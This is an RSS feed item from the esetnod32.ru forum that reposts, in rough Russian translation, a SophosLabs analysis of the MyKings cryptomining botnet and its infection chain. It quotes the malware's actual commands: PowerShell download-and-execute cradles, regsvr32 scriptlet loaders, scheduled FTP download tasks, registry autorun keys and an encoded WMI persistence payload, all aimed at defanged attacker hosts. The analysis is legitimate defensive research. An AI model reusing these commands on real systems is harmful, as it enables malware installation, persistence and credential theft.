<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: MyKings: медленный, но неустанный рост ботнета]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме MyKings: медленный, но неустанный рост ботнета форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Fri, 01 May 2026 04:43:13 +0300</pubDate>
		<item>
			<title>MyKings: медленный, но неустанный рост ботнета</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/">MyKings: медленный, но неустанный рост ботнета</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>SophosLab</B> ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.<br /><br /><B>MyKings: медленный, но неустанный рост ботнета<br /></B><br /> &nbsp; &nbsp;Ботнет <B>MyKings</B> имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.<br /><br />Вступление<br /><br />Ботнет <B>MyKings / DarkCloud / Smominru</B> (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.<br /><br />Основные выводы этого исследования заключаются в следующем:<br /><br />* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.<br /><br />* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.<br /><br />Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.<br /><br />Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.<br /><br />В число наиболее инфицированных стран входили:<br /><br />* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония<br /><br />Процесс заражения<br /><br />Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.<br /><br />ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.<br /><br />Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.<br /><br />Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.<br /><br />Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.<br /><br />Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.<br /><br />c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.<br /><br />Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся<br /><br />Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:<br /><br /><br />====quote====<br /> &nbsp; &nbsp;doc001.exe (майнер XMRig)<br /> &nbsp; &nbsp;docv8.exe (майнер XMRig)<br /> &nbsp; &nbsp;wodCmdTerm.exe (майнер XMRig)<br /> &nbsp; &nbsp;NsCpuCNMiner64.exe (CNMiner)<br /> &nbsp; &nbsp;tlscntr.exe (майнер XMRig)<br /> &nbsp; &nbsp;ctfmonc.exe (майнер XMRig)<br /> &nbsp; &nbsp;wuauser.exe (майнер XMRig)<br /> &nbsp; &nbsp;mscsuscr.exe (майнер XMRig)<br /> &nbsp; &nbsp;Pviunc.exe (майнер XMRig)<br /> &nbsp; &nbsp;Bllianc.exe (майнер XMRig)<br /> &nbsp; &nbsp;dether.exe (майнер XMRig)<br /><br />=============<br /><br />Правила межсетевого экрана<br /><br />Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.<br /><br />Обновление компонентов<br /><br />Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:<br /><br /><br />====quote====<br /> &nbsp; &nbsp;powershell.exe IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX<br /> &nbsp; &nbsp;(New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX<br /> &nbsp; &nbsp;(New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u<br /> &nbsp; &nbsp;/s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll&regsvr32 /u /s<br /> &nbsp; &nbsp;/i:hxxp://173.208.139[.]170/2.txt scrobj.dll&regsvr32 /u /s /i:hxxp://35.182.171[.]137/3.txt<br /> &nbsp; &nbsp;scrobj.dll"<br />=============<br /><br />Роль загружаемых файлов следующая:<br />• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe<br />• s.txt: скрипт сбора информации<br />• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.<br />• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).<br />• 2.txt: список URL-адресов для компонентов.<br /><br />Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере<br /><br />Устойчивость<br /><br />Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы<br /><br />Буткит<br /><br />Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.<br /><br />Ключи автозапуска в реестре<br /><br />В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d<br /> &nbsp; &nbsp;"regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f<br /><br /> &nbsp; &nbsp;reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\<WBR/>&shy;Run" /v<br /> &nbsp; &nbsp;"start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f<br />=============<br /><br /><br /><br />Задачи по расписанию<br /><br />Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:<br />ok, Mysa, Mysa1, Mysa2 и Mysa3.<br /><br />Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz&gt;s&echo<br /> &nbsp; &nbsp;test&gt;&gt;s&echo 1433&gt;&gt;s&echo binary&gt;&gt;s&echo get a.exe c:\windows\update.exe&gt;&gt;s&echo<br /> &nbsp; &nbsp;bye&gt;&gt;s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F<br /><br /> &nbsp; &nbsp;schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz&gt;p&echo<br /> &nbsp; &nbsp;test&gt;&gt;p&echo 1433&gt;&gt;p&echo get s.dat c:\windows\debug\item.dat&gt;&gt;p&echo bye&gt;&gt;p&ftp<br /> &nbsp; &nbsp;-s:p" /ru "system" /sc onstart /F<br /><br /> &nbsp; &nbsp;schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz&gt;ps&echo<br /> &nbsp; &nbsp;test&gt;&gt;ps&echo 1433&gt;&gt;ps&echo get s.rar c:\windows\help\lsmosee.exe&gt;&gt;ps&echo<br /> &nbsp; &nbsp;bye&gt;&gt;ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F<br />=============<br /><br />Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.<br /><br />Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.<br /><br />====quote====<br /><br /> &nbsp; &nbsp;schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F<br />=============<br /><br /><br /><br />сценарии WMI<br /><br />Третий метод использует фильтры WMI для установления исполнения.<br /><br />c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:<br /><br /> <br />====quote====<br /> &nbsp; • fuckyoumm2_filter<br /> &nbsp; &nbsp;• fuckyoumm2_consumer<br /> &nbsp; &nbsp;• fuckayoumm3<br /> &nbsp; &nbsp;• fuckayoumm4<br /> &nbsp; &nbsp;• Windows Events Consumer<br /> &nbsp; &nbsp;• Windows Events Consumer4<br /> &nbsp; &nbsp;• Windows Events Filter<br />=============<br /><br /><br />Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).<br /><br /> &nbsp; <br />====quote====<br /> wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",<br /> &nbsp; &nbsp;EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM<br /> &nbsp; &nbsp;__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA<br /> &nbsp; &nbsp;'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"<br /> &nbsp; &nbsp;PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",<br /> &nbsp; &nbsp;CommandLineTemplate="cmd /c powershell.exe -nop -enc<br /> &nbsp; &nbsp;"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB<WBR/>&shy;OAGUAdAAuAFcAZQBiA<br /> &nbsp; &nbsp;EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAa<WBR/>&shy;QBuAGcAKAAnAGgAdAB0<br /> &nbsp; &nbsp;AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIA<WBR/>&shy;LgB0AHgAdAAnACkALgB<br /> &nbsp; &nbsp;0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACc<WBR/>&shy;AfAAlAHsAJABuAD0AJA<br /> &nbsp; &nbsp;BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG<WBR/>&shy;8AdwBuAGwAbwBhAGQAR<br /> &nbsp; &nbsp;gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9A<WBR/>&shy;A=="&powershell.ex<br /> &nbsp; &nbsp;e IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh<br /> &nbsp; &nbsp;ell.exe IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe<br /> &nbsp; &nbsp;ll.exe IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32<br /> &nbsp; &nbsp;/u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll&regsvr32 /u /s<br /> &nbsp; &nbsp;/i:hxxp://173.208.139[.]170/2.txt scrobj.dll&regsvr32 /u /s<br /> &nbsp; &nbsp;/i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic<br /> &nbsp; &nbsp;/NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE<br /> &nbsp; &nbsp;Filter="__EventFilter.Name="fuckyoumm3"",<br /> &nbsp; &nbsp;Consumer="CommandLineEventConsumer.Name="fuckyoumm4""<br /><br />=============<br /><br />Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.<br /><br /> &nbsp; <br />====quote====<br /> hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться).<br /><br /> &nbsp; &nbsp;$wc=New-Object<br /> &nbsp; &nbsp;System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim(<br /> &nbsp; &nbsp;) -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}<br /><br />=============<br />Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;hxxp://173.247.239[.]186/ok.exe<br /> &nbsp; &nbsp;hxxp://173.247.239[.]186/upsupx.exe<br /> &nbsp; &nbsp;hxxp://173.247.239[.]186/u.exe<br />=============<br /><br />Дополнительные три команды в сценарии WMI загружают еще три компонента:<br /><br /> &nbsp; <br />====quote====<br /> hxxp://173.208.139[.]170/s.txt<br /> &nbsp; &nbsp;hxxp://35.182.171[.]137/s.jpg<br /> &nbsp; &nbsp;hxxp://wmi.1217bye[.]host/S.ps1<br />=============<br /><br />Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.<br /><br />Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;lsmose.exe,C:\Windows\debug\lsmose.exe,1<br /> &nbsp; &nbsp;lsmos.exe,C:\Windows\debug\lsmos.exe,1<br /> &nbsp; &nbsp;lsmo.exe,C:\Windows\debug\lsmo.exe,1<br /> &nbsp; &nbsp;csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119<br /> &nbsp; &nbsp;csrw.exe,C:\Program Files\Common Files\csrw.exe,1<br /> &nbsp; &nbsp;lsmosee.exe,c:\windows\help\lsmosee.exe,1<br /> &nbsp; &nbsp;csrs.exe,c:\csrs.exe,1<br />=============<br /><br /><br />В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.<br /><br /><noindex><a href="https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophoslabs-uncut-mykings-report.pdf" target="_blank" rel="nofollow">полный отчет здесь</a></noindex> <br />
			<i>21.08.2021 13:32:22, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/</guid>
			<pubDate>Sat, 21 Aug 2021 13:32:22 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
	</channel>
</rss>
